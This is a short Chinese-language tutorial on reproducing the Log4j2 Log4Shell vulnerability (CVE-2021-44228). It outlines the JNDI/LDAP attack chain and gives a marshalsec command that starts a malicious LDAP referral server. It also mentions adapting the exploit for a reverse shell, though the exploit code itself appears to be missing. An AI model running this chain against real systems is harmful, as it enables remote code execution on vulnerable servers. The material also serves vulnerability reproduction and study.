ApacheLog4j2(CVE-2021-44228)漏洞详细复现过程    ⾸先我们要理解漏洞产⽣的原因,我们构造的payload在LDAP客户端(存在漏洞的机器)执⾏,payload地址为LDAP服务端,LDAP 服务端从HTTP服务器加载恶意⽂件。(验证的话,payload直接为DNS服务器即可)
以github上项⽬为例:
⼀、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载
⼆、启动LDAP服务端,访问HTTP服务器下载exp。等待LDAP客户端来连接
cd tools
cve漏洞库
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "127.0.0.1:8888/#Exploit"
监听在1389端⼝,可⾃定义修改为任意端⼝(命令后加端⼝号即可)
三、LDAP客户端(受害者)执⾏payload,连接LDAP服务器,执⾏恶意代码
apache-log4j-poc/src/main/java/log4j.java
ps:
反弹shell修改exp即可:

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。